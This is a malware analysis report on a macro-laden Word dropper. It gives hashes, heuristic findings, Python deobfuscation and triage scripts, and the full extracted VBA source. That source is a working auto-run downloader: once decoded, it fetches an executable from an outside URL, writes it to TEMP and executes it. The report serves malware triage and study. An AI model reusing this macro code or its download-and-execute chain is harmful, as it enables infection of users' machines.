Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 182c15380350a636…

MALICIOUS

Office (OLE)

Size: 67.5 KB
Created: 2016-05-12 00:52:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: 15668e62d79bb5d6566f8d0978025121
SHA-1: 5cce126e7213803b059687a81aa0db45cab0ca94
SHA-256: 182c15380350a636e948133dbcc07a23e6c4f43fab27772b8d48a15f2e729c07
Risk score: 350

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1071.001 Application Layer Protocol: Web Protocols

The sample contains VBA macros, including a Document_Open subroutine that runs as soon as the document is opened with macros enabled (the p-code heuristic confirms the auto-exec trigger even where source extraction fails). The code is name-mangled and never calls a COM method directly: every call goes through CallByName with a member name rebuilt at runtime by Ithby.WMJcdb, a filter that drops each character of a string that also occurs in a short key. Only the ProgIDs passed to CreateObject (MSXML2.ServerXMLHTTP.6.0, ADODB.Stream and WScript.Shell) survive in clear text. Reversing the filter on the literals in the listing below gives the full downloader chain: ServerXMLHTTP.Open "GET" against http://olcayfotograf.com/system/cache/word.exe with the header User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0), Send, ResponseBody written through an ADODB.Stream with Type 1 (binary) and SaveToFile into the TEMP directory as c3876d00d73d.exe, then WScript.Shell.Exec on that path. The only URL the extractor found in clear text, http://schemas.openxmlformats.org/drawingml/2006/main, is a standard OOXML schema namespace present in virtually every Word file and is not an indicator; the real download URL is the one recovered from the filtered strings.

Heuristics 11

  • ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim GkJzXt As String, qqQWMQOv As Integer
    Set KAhKKpGlzU = CreateObject("WScript.Shell")
    End Function
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Function JXBzmLfW() As Object
    Set JXBzmLfW = CreateObject("ADODB.Stream")
    End Function
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Dim AyqGqXefQ As String
    igJOtE = CallByName(njYPWrJSMM, ldaWc, 2)
    End Function
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim mttSwvbe As Integer
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED
    Long run of 0x40 bytes (0x40 is the single-byte `inc eax`, which is harmless to land on, so a run of it can serve as a NOP sled). Caveat: inside an OLE container a run of identical bytes is far more often structural or image data than shellcode, and this hit is a false positive. The bytes directly after the run, FF C0 00 11 08 00 78 00 96 03 ..., are a baseline JPEG SOF0 frame header (8-bit, 150 x 120 pixels, 3 components) whose declared 17-byte length lands exactly on the next marker, FF C4 (DHT, a Huffman table). This is an embedded picture, and the x86 listing below it is noise.
    Disassembly
    Attempted x86 opcode disassembly (reproduced as the tool emitted it; it is not meaningful code)
    000023FE  40                inc eax
    000023FF  40                inc eax
    00002400  40                inc eax
    00002401  40                inc eax
    00002402  40                inc eax
    00002403  40                inc eax
    00002404  40                inc eax
    00002405  40                inc eax
    00002406  40                inc eax
    00002407  40                inc eax
    00002408  40                inc eax
    00002409  40                inc eax
    0000240A  40                inc eax
    0000240B  40                inc eax
    0000240C  40                inc eax
    0000240D  40                inc eax
    0000240E  40                inc eax
    0000240F  40                inc eax
    00002410  40                inc eax
    00002411  40                inc eax
    00002412  40                inc eax
    00002413  40                inc eax
    00002414  40                inc eax
    00002415  40                inc eax
    00002416  40                inc eax
    00002417  40                inc eax
    00002418  40                inc eax
    00002419  40                inc eax
    0000241A  40                inc eax
    0000241B  40                inc eax
    0000241C  40                inc eax
    0000241D  40                inc eax
    0000241E  40                inc eax
    0000241F  40                inc eax
    00002420  40                inc eax
    00002421  40                inc eax
    00002422  40                inc eax
    00002423  40                inc eax
    00002424  40                inc eax
    00002425  40                inc eax
    00002426  40                inc eax
    00002427  40                inc eax
    00002428  40                inc eax
    00002429  40                inc eax
    0000242A  40                inc eax
    0000242B  40                inc eax
    0000242C  40                inc eax
    0000242D  40                inc eax
    0000242E  40                inc eax
    0000242F  ffc0              inc eax
    00002431  0011              add byte ptr [ecx], dl
    00002433  0800              or byte ptr [eax], al
    00002435  7800              js 0x2437
    00002437  96                xchg esi, eax
    00002438  0301              add eax, dword ptr [ecx]
    0000243A  2200              and al, byte ptr [eax]
    0000243C  0211              add dl, byte ptr [ecx]
    0000243E  0103              add dword ptr [ebx], eax
    00002440  1101              adc dword ptr [ecx], eax
    00002442  ffc4              inc esp
    00002444  007900            add byte ptr [ecx], bh
    00002447  0100              add dword ptr [eax], eax
    00002449  0202              add al, byte ptr [edx]
    0000244B  0301              add eax, dword ptr [ecx]
    0000244D  0000              add byte ptr [eax], al
    0000244F  0000              add byte ptr [eax], al
    00002451  0000              add byte ptr [eax], al
    00002453  0000              add byte ptr [eax], al
    00002455  0000              add byte ptr [eax], al
    00002457  000406            add byte ptr [esi + eax], al
    0000245A  03                .byte 0x03
    0000245B  05                .byte 0x05
    0000245C  0207              add al, byte ptr [edi]
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
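A check worth running on the SC_NOP_EQUIV_SLED hit above before treating it as shellcode, given here as an added example that is not part of the report's own tooling: walk the bytes after the 0x40 run as JPEG marker segments and see whether the declared segment lengths line up on further markers. The byte string is transcribed from the disassembly dump (offset 0x2420 onward; the dump is cut off inside the DHT segment, so that segment is reported as truncated rather than rejected).

```python
import struct

# Bytes transcribed from the disassembly dump in the report, from offset 0x2420:
# the tail of the 0x40 run, then what the tool decoded as x86 instructions.
# Constructed for this example; the dump ends after offset 0x245D.
DUMP = bytes([0x40] * 15) + bytes.fromhex(
    "ffc0 0011 08 0078 0096 03 012200 021101 031101"    # FF C0: SOF0, 17-byte segment
    "ffc4 0079 00 01000202030100000000000000000000"     # FF C4: DHT, 121-byte segment
    "040603050207"                                      # first Huffman symbols (truncated)
)

MARKERS = {0xC0: "SOF0", 0xC4: "DHT", 0xDB: "DQT", 0xDA: "SOS"}


def parse_jpeg_segments(data: bytes) -> list:
    """Walk JPEG marker segments: FF xx followed by a 2-byte big-endian length
    that counts itself. Returns one dict per segment. A segment whose declared
    length runs past the end of `data` is flagged truncated instead of raising,
    because the report's dump stops mid-DHT. Stops as soon as a declared length
    does not land on another FF, which is what random data does almost at once."""
    segments = []
    i = data.find(b"\xff")
    while i != -1 and i + 4 <= len(data):
        marker = data[i + 1]
        if marker in (0x00, 0xFF) or 0xD0 <= marker <= 0xD9:
            # stuffed byte, fill byte, or a standalone marker (RSTn/SOI/EOI) without length
            i = data.find(b"\xff", i + 1)
            continue
        (length,) = struct.unpack(">H", data[i + 2:i + 4])
        seg = {
            "offset": i,
            "marker": MARKERS.get(marker, f"0x{marker:02X}"),
            "length": length,
            "truncated": i + 2 + length > len(data),
        }
        if marker == 0xC0 and not seg["truncated"]:
            precision, height, width, ncomp = struct.unpack(">BHHB", data[i + 4:i + 10])
            seg.update(precision=precision, height=height, width=width, components=ncomp)
        segments.append(seg)
        i = i + 2 + length
        if i < len(data) and data[i] != 0xFF:
            break  # length did not land on a marker: not a JPEG segment chain
    return segments


def is_image_not_code(data: bytes) -> bool:
    """True when the first marker after the byte run is a well-formed SOF0 whose
    length lands exactly on a DHT marker, i.e. the bytes are an embedded picture."""
    segs = parse_jpeg_segments(data)
    return len(segs) >= 2 and segs[0]["marker"] == "SOF0" and segs[1]["marker"] == "DHT"


if __name__ == "__main__":
    for seg in parse_jpeg_segments(DUMP):
        print(seg)
    print("embedded image, not shellcode:", is_image_not_code(DUMP))
```

The same walk fails within one step on genuine shellcode or on the sled itself, because a random 16-bit "length" almost never lands on another FF byte; that asymmetry is what makes it a cheap triage filter for sled-style heuristics on document formats that commonly embed JPEGs.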

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9063 bytes
SHA-256: 491da5bc70e68e2bcfc429751d331e78be923dfee5123b6ac4caff3c1d8f1f8b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
173 of 246 identifiers look randomly generated (e.g. 'KAhKKpGlzU', 'SdkIZOeRT'), consistent with name-mangling obfuscation. String literals such as 'SDe3tQKRKeqPuDPePst3HDDeaQd3eKDr' are padded the same way but are arguments to the filter function rather than identifiers; that one reduces to SetRequestHeader once the characters of its key 'QPD3K' are dropped.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function JqSvkGCPGA() As Integer
hFrQPtBp
iOEGGBQELK
JqSvkGCPGA = 4779
End Function
Private Sub Document_Open()
Dim mttSwvbe As Integer
wyGWpY.pbSZCXhmSD
End Sub
Private Sub HgMddfJ(ByVal wnaYy As Integer)
kKhjcbO
If kbFfJcWPDT("fJB17jk5p", 6938) Then
Vvqbl
fCDqvdI
tMRaXX 5233, "RlRkIP7MU19", 762
End If
End Sub
Private Sub tboKsvkN(ByVal QFlarOMYH As Integer, ByVal HPkFLb As Integer)
WbFWObBP
End Sub
Private Sub WYPBWcKU(ByVal rPhzMg As String, ByVal wcQpWQl As Boolean)
hpyzkXXV "8XydRQkTGiMrmox", False, 6811
NhNNP 1698, 8412
If iqsSlw Then
HXncUHot "B0xDIQATZFOts"
KvgAFCY
HSewNUUfX "B7djm91Oy"
Else
eBXHSXxSTm
End If
XPKypJaPJ 6078, True, 3113
End Sub

Attribute VB_Name = "Ithby"
Private Function GbkVYXuh() As Boolean
puBqPC False, "kaC5cYrlDrvDp"
GbkVYXuh = True
End Function
Private Sub DYnUp(ByVal UrZpgn As String, ByVal PNDGAns As Integer)
oRQsMB
End Sub
Public Function WMJcdb(ByVal vBbzbEV As String, ByVal aJqFS As String) As String
Dim qqqGmed As Boolean, JgXpwpW As String
For zNoozTBlcV = 1 To Len(vBbzbEV)
qqqGmed = yohIEvNDuU.jpjwnKChj(yohIEvNDuU.jdqox(vBbzbEV, zNoozTBlcV), aJqFS, 638)
MWgdETofR = 5559
If Not qqqGmed Then
WMJcdb = WMJcdb & yohIEvNDuU.jdqox(vBbzbEV, zNoozTBlcV)
LICDvxAOy = 7085
End If
Next
End Function
Private Function TepKJZzNjv() As Boolean
RiNRh 3745
TepKJZzNjv = True
End Function
Private Function PgqZWnW(ByVal ibMyK As Integer, ByVal xpnMVUt As Integer) As String
wzDcvaHzAL "kI526hU65u"
lLNzEN 414
yvqqniWt 6874, False, True
PgqZWnW = "3olpYJqw9J3n"
End Function

Attribute VB_Name = "SdkIZOeRT"
Public Function igJOtE(ByVal njYPWrJSMM As Object, ByVal ldaWc As String) As Variant
Dim AyqGqXefQ As String
igJOtE = CallByName(njYPWrJSMM, ldaWc, 2)
End Function
Public Sub pOJmNb(ByVal yClPgtlq As Variant, ByVal PSoJbKoEba As Variant, ByVal bxDAQNTzFR As String, ByVal oSHsWLUbG As Object)
CallByName oSHsWLUbG, bxDAQNTzFR, 1, yClPgtlq, PSoJbKoEba
End Sub
Public Sub ISoSx(ByVal kHdGTYNKtC As String, ByVal eqBYT As Integer, ByVal nHPJawCsAX As Object, ByVal WApkqBkVA As Variant, ByVal XQkBMm As String)
Dim wekeFAKS As Boolean, YoAekV As String
CallByName nHPJawCsAX, kHdGTYNKtC, 1, WApkqBkVA
End Sub
Public Sub nyVis(ByVal CosRCSg As String, ByVal LOMaAFXq As Object)
Dim OLqsgyKydz As Integer, klFXu As Integer
CallByName LOMaAFXq, CosRCSg, 1
End Sub
Public Sub nBEdpfoE(ByVal KwfoJtk As Variant, ByVal WFHGLp As Variant, ByVal wlFegzlvgk As Boolean, ByVal nczauBS As Variant, ByVal yCUkSvZ As String, ByVal SPWDW As Object)
Dim KYLDLixc As Boolean
OWoNkkz = "AQJOV7YRmX5yV"
CallByName SPWDW, yCUkSvZ, 1, WFHGLp, nczauBS, KwfoJtk
End Sub
Public Function kwcXIuGy(ByVal aWlnczuLx As String, ByVal iROcCO As Boolean, ByVal TjNlOT As Integer, ByVal SPWDW As Object, ByVal IuNfhZ As String) As Variant
Set kwcXIuGy = CallByName(SPWDW, aWlnczuLx, 2, IuNfhZ)
End Function
Public Sub LrnQauZ(ByVal hlUbE As Integer, ByVal LwsvZ As String, ByVal ycGOStjrZ As Integer, ByVal vHzOKu As Variant, ByVal DHNjqjc As Object)
Dim kWSBuH As Integer, oViydMyrTP As Integer
xAnXsgtN = False
CallByName DHNjqjc, LwsvZ, 4, vHzOKu
End Sub

Attribute VB_Name = "tvRhy"
Public Function JXBzmLfW() As Object
Set JXBzmLfW = CreateObject("ADODB.Stream")
End Function
Public Function UXVspUID() As Object
Dim pOOVI As Integer
Set UXVspUID = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Public Function KAhKKpGlzU() As Object
Dim GkJzXt As String, qqQWMQOv As Integer
Set KAhKKpGlzU = CreateObject("WScript.Shell")
End Function

Attribute VB_Name = "wyGWpY"
Private Function QXrMrsQ() As String
QXrMrsQ = Ithby.WMJcdb("wRe3wspwowrnsr3erBow3dyw", "rw3")
End Function
Private Function scjAPmCwO() As String
Dim lGbQqfR As Integer
Dim IhUBVCEbAW As Boolean
scjAPmCwO = bYQQFY(FREjEkH, towxipv, towxipv) & SKxccKIV
End Function
Private Sub hvlgmlO(ByVal wyWIWLuRIj As String, ByVal WUBDjJ As Boolean, ByVal PuKhJZxo As Integer, ByVal BusaGxT As Variant)
Dim IHZRneyP As Boolean, CwzbrzK As Integer
Set QhWGb = tvRhy.JXBzmLfW
SdkIZOeRT.LrnQauZ 708, Ithby.WMJcdb("Taayqpae", "7qa."), 3110, 1, QhWGb
SdkIZOeRT.nyVis Ithby.WMJcdb("OXpresns", "r.Xtsu"), QhWGb
SdkIZOeRT.ISoSx Ithby.WMJcdb("EWrQi3EteE", "3QEN"), 6128, QhWGb, BusaGxT, fvzkjXLk
SdkIZOeRT.pOJmNb wyWIWLuRIj, 2, xAOKQ, QhWGb
SdkIZOeRT.nyVis VajxKpN, QhWGb
End Sub
Private Sub xdPBYHjHn()
Dim yDPim As Boolean, OBfNwD As String
On Error GoTo lcLlmF
CrqRpOlM 2612, scjAPmCwO, SilHR
NHFOEgVeoo scjAPmCwO
RPCxFN = "z33eikgFE"
Exit Sub
vkLGZ = 5682
lcLlmF:
End Sub
Private Function fvzkjXLk() As String
fvzkjXLk = "Hm9PzpqXM8Tk"
End Function
Private Sub NHFOEgVeoo(ByVal miSGHSYuNw As String)
SdkIZOeRT.ISoSx zyGqC, 6128, tvRhy.KAhKKpGlzU, miSGHSYuNw, XNPJQFXYf
End Sub
Private Function XNPJQFXYf() As String
XNPJQFXYf = "Jq6p51kMY"
End Function
Private Function bYQQFY(ByVal GSaGv As String, ByVal UTbiy As String, ByVal ypnxtROJG As String) As String
Dim FFDtdQ As String
JixRwEJkN = False
Set ectSqGDH = SdkIZOeRT.kwcXIuGy(Ithby.WMJcdb("EW7nvFWiHro6Hnm7FeHnFt", "6H47WF"), False, 7872, tvRhy.KAhKKpGlzU, Ithby.WMJcdb("wPR6Od6CdESwiS", "xdtw6i"))
bYQQFY = ectSqGDH(GSaGv)
End Function
Private Function SilHR() As String
Dim MpmvU As Boolean
Dim exxvbLptH As Boolean
SilHR = gOwGIDiAO
End Function
Private Function haUcDjaieH() As String
NXgcHedZ = "lJXprLrLKbix"
haUcDjaieH = Ithby.WMJcdb("S2Ce2nd2", "2Co")
End Function
Private Function gOwGIDiAO() As String
gOwGIDiAO = Ithby.WMJcdb("hPCtEtEp:b/IP/oblPCcCabyEfobtEoEPgErIabf.IcEoYmC/bsbybCsEtIeCm/CPcaEPcbhYe/bwCYoCrEdP.eYExeC", "IPCEbY")
End Function
Private Function SKxccKIV() As String
Dim bZoLtgFpw As String
SKxccKIV = JupTi
End Function
Private Function VajxKpN() As String
VajxKpN = Ithby.WMJcdb("Ciliopiske", "tkpi")
End Function
Private Sub Kqnuz(ByVal dlxdZiiDh As Integer, ByVal olcBEYEmB As Boolean)
nlzlivrN 5254, False, False
bHCdDp True, 2221
dKGQB 8006, True, 7782
If fCAhhnf(9180) Then
XWIMFEtxub False
IXexmLYhXX
VDDMzyez 9562
Else
gcJTlZZrR 2876, False
End If
ihWWxOEu 7730, True, "tf0zmSAodfN"
End Sub
Private Function zyGqC() As String
JywcHztmR = "d4OR3A9CGIEikH"
zyGqC = Ithby.WMJcdb("rEWxteWc", "1rWt")
End Function
Private Function YnBzQ() As String
If pjTUCKd(5843, "woONT25Thy") Then
zeMphePZDz 1173, "I2g1yWKwm"
zUtoVINdP 2806, "la8LZGheRu", 559
jvyLJjMjyn
End If
YnBzQ = "DBI3Lm69ouaxgNX"
End Function
Private Function XvQcr() As String
XvQcr = Ithby.WMJcdb("VMQoVziGlQlQQav/5Vv.Q0 QQ(QcVoQmpvaVtQviGbGlVeV; GMGGSIvvEV 9V.vG0;VV WViQGnvdoQwQVsv NQVTG 7Q.QG1V;Q TvvriQdVevnvGt/GQ5G.G0)v", "vVQG")
End Function
Private Function jEAYTHsh() As String
jEAYTHsh = Ithby.WMJcdb("OXpresns", "r.Xtsu")
End Function
Private Sub CrqRpOlM(ByVal tAAsHrFZ As Integer, ByVal eFaIBUyeVu As String, ByVal RYojJhb As String)
Dim FWmFFOn As Integer, QmSSGLrIL As Integer
Set SwsQIpxEC = tvRhy.UXVspUID
vAhuigCxLB = "6Z6ITHFTp"
SdkIZOeRT.nBEdpfoE False, Ithby.WMJcdb("6GE Ta", " a96S"), False, RYojJhb, jEAYTHsh, SwsQIpxEC
SdkIZOeRT.pOJmNb Ithby.WMJcdb("U.sNeTNrN-ANgNTenNt.", "mT.N"), XvQcr, Ithby.WMJcdb("SDe3tQKRKeqPuDPePst3HDDeaQd3eKDr", "QPD3K"), SwsQIpxEC
SdkIZOeRT.nyVis haUcDjaieH, SwsQIpxEC
hvlgmlO eFaIBUyeVu, True, 3347, SdkIZOeRT.igJOtE(SwsQIpxEC, QXrMrsQ)
End Sub
Private Function JupTi() As String
JupTi = Ithby.WMJcdb("P/cF3w8B7P6FBdF00pdF7hh3dB.FeFxFPe", "wBhPFp")
End Function
Public Sub pbSZCXhmSD()
Dim BCcHV As Integer
xdPBYHjHn
End Sub
Private Function OsKGshuod() As Integer
WmkFh
cIsPekWV 9366
OsKGshuod = 9266
End Function
Private Function towxipv() As String
towxipv = "DISj4y0ywL7NH7g"
End Function
Private Function xAOKQ() As String
xAOKQ = Ithby.WMJcdb("6Sakbve66T6oFbkibl6e", "6kb")
End Function
Private Function FREjEkH() As String
FREjEkH = Ithby.WMJcdb("ZTEZIMPZ", "ZoWIO")
End Function

Attribute VB_Name = "yohIEvNDuU"
Private Sub pUdTu(ByVal aqxVWbfR As String)
XHvfGalf
BZbDy False, True, 5361
End Sub
Private Sub nUSoQrDd()
UKUhJchCfN False
UOlvZCoKSe "kzpKzUEINlR4N", 3119
BWDat "xpqAZayG7hMN"
End Sub
Private Function ddtCtq(ByVal FCWjcNQVF As String, ByVal vuVaS As String) As Boolean
UiaKS 8628
jalCYyVT
wbAhL 7029
ddtCtq = True
End Function
Private Sub VlzvwFRdHT(ByVal LCDzSSLr As Boolean, ByVal jCFsafeZa As String)
mokZnpH
HulbI "OGUUM2KcfmcPa"
End Sub
Public Function jpjwnKChj(ByVal sXfnOZpB As String, ByVal XApeM As String, ByVal WGDoQDr As Integer) As Boolean
Dim LuJmzfrRdU As Boolean
jpjwnKChj = InStr(1, XApeM, sXfnOZpB)
End Function
Public Function jdqox(ByVal RKlkWqrIQ As String, ByVal YXFBGbGx As Integer) As String
Dim auYmv As Boolean
Dim tAzuDfeyPm As Boolean
jdqox = Mid(RKlkWqrIQ, YXFBGbGx, 1)
End Function
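The string filter in the listing above (Ithby.WMJcdb, with yohIEvNDuU.jpjwnKChj and yohIEvNDuU.jdqox as its InStr and Mid helpers) is the whole of the obfuscation, so a few lines of Python recover every API name and indicator. The following is an added example, not part of the report or of olevba: it re-implements the filter, harvests the literal calls from an excerpt of the macro source copied from the listing, and separates the URL, User-Agent and drop name from the member names fed to CallByName. Rendering the drop path with a %TEMP% prefix is an assumption for display; the macro actually reads the variable through WScript.Shell.Environment("PROCESS")("TEMP") in bYQQFY.

```python
from __future__ import annotations
import re

# Excerpt of the macro source listed above (the lines that call the string
# filter Ithby.WMJcdb), embedded so the script runs offline without the sample.
MACRO_EXCERPT = r'''
QXrMrsQ = Ithby.WMJcdb("wRe3wspwowrnsr3erBow3dyw", "rw3")
SdkIZOeRT.LrnQauZ 708, Ithby.WMJcdb("Taayqpae", "7qa."), 3110, 1, QhWGb
SdkIZOeRT.nyVis Ithby.WMJcdb("OXpresns", "r.Xtsu"), QhWGb
SdkIZOeRT.ISoSx Ithby.WMJcdb("EWrQi3EteE", "3QEN"), 6128, QhWGb, BusaGxT, fvzkjXLk
Set ectSqGDH = SdkIZOeRT.kwcXIuGy(Ithby.WMJcdb("EW7nvFWiHro6Hnm7FeHnFt", "6H47WF"), False, 7872, tvRhy.KAhKKpGlzU, Ithby.WMJcdb("wPR6Od6CdESwiS", "xdtw6i"))
haUcDjaieH = Ithby.WMJcdb("S2Ce2nd2", "2Co")
gOwGIDiAO = Ithby.WMJcdb("hPCtEtEp:b/IP/oblPCcCabyEfobtEoEPgErIabf.IcEoYmC/bsbybCsEtIeCm/CPcaEPcbhYe/bwCYoCrEdP.eYExeC", "IPCEbY")
VajxKpN = Ithby.WMJcdb("Ciliopiske", "tkpi")
zyGqC = Ithby.WMJcdb("rEWxteWc", "1rWt")
XvQcr = Ithby.WMJcdb("VMQoVziGlQlQQav/5Vv.Q0 QQ(QcVoQmpvaVtQviGbGlVeV; GMGGSIvvEV 9V.vG0;VV WViQGnvdoQwQVsv NQVTG 7Q.QG1V;Q TvvriQdVevnvGt/GQ5G.G0)v", "vVQG")
SdkIZOeRT.nBEdpfoE False, Ithby.WMJcdb("6GE Ta", " a96S"), False, RYojJhb, jEAYTHsh, SwsQIpxEC
SdkIZOeRT.pOJmNb Ithby.WMJcdb("U.sNeTNrN-ANgNTenNt.", "mT.N"), XvQcr, Ithby.WMJcdb("SDe3tQKRKeqPuDPePst3HDDeaQd3eKDr", "QPD3K"), SwsQIpxEC
JupTi = Ithby.WMJcdb("P/cF3w8B7P6FBdF00pdF7hh3dB.FeFxFPe", "wBhPFp")
xAOKQ = Ithby.WMJcdb("6Sakbve66T6oFbkibl6e", "6kb")
FREjEkH = Ithby.WMJcdb("ZTEZIMPZ", "ZoWIO")
'''


def wmjcdb(text: str, key: str) -> str:
    """Re-implementation of Ithby.WMJcdb: every character of `text` that also
    occurs in `key` is dropped. The original tests membership with InStr, which
    is case-sensitive under the default Option Compare Binary, so an uppercase
    'C' in a key does not remove a lowercase 'c'."""
    return "".join(ch for ch in text if ch not in key)


# Matches WMJcdb("<literal>", "<key>"); none of the sample's literals contain quotes.
CALL_RE = re.compile(r'WMJcdb\("([^"]*)",\s*"([^"]*)"\)')


def harvest(vba_source: str) -> list[tuple[str, str, str]]:
    """(obfuscated literal, key, decoded) for every WMJcdb call with literal arguments."""
    return [(s, k, wmjcdb(s, k)) for s, k in CALL_RE.findall(vba_source)]


def decoded_strings(vba_source: str = MACRO_EXCERPT) -> list[str]:
    return [d for _, _, d in harvest(vba_source)]


def indicators(vba_source: str = MACRO_EXCERPT) -> dict[str, object]:
    """Split the decoded strings into network/file indicators and the rest
    (COM member names plus the HTTP verb, header and environment-variable names)."""
    decoded = decoded_strings(vba_source)
    url = next(d for d in decoded if d.startswith(("http://", "https://")))
    user_agent = next(d for d in decoded if d.startswith("Mozilla/"))
    drop_name = next(d for d in decoded if d.lower().endswith(".exe") and d != url)
    names = sorted(d for d in decoded if d not in (url, user_agent, drop_name))
    # The macro prefixes drop_name with WScript.Shell.Environment("PROCESS")("TEMP");
    # writing that as %TEMP% is an assumption for display only.
    return {"url": url, "user_agent": user_agent,
            "drop_path": "%TEMP%" + drop_name, "names": names}


if __name__ == "__main__":
    for obf, key, clear in harvest(MACRO_EXCERPT):
        print(f"{clear!r:45} <- {obf!r} minus {key!r}")
    print(indicators())
```

Running it as a script prints the 17 decoded literals and the indicator dictionary. Resolving each CallByName site in the listing by substituting the decoded member name then reads off the chain directly (Open "GET" url False; SetRequestHeader "User-Agent" ...; Send; ResponseBody; Type = 1; Open; Write; SaveToFile path, 2; Close; Exec path). The approach carries over to other Donoff-style samples that hide strings behind a one-line transform: harvest the literal calls, re-implement the transform, and let the decoded names do the rest.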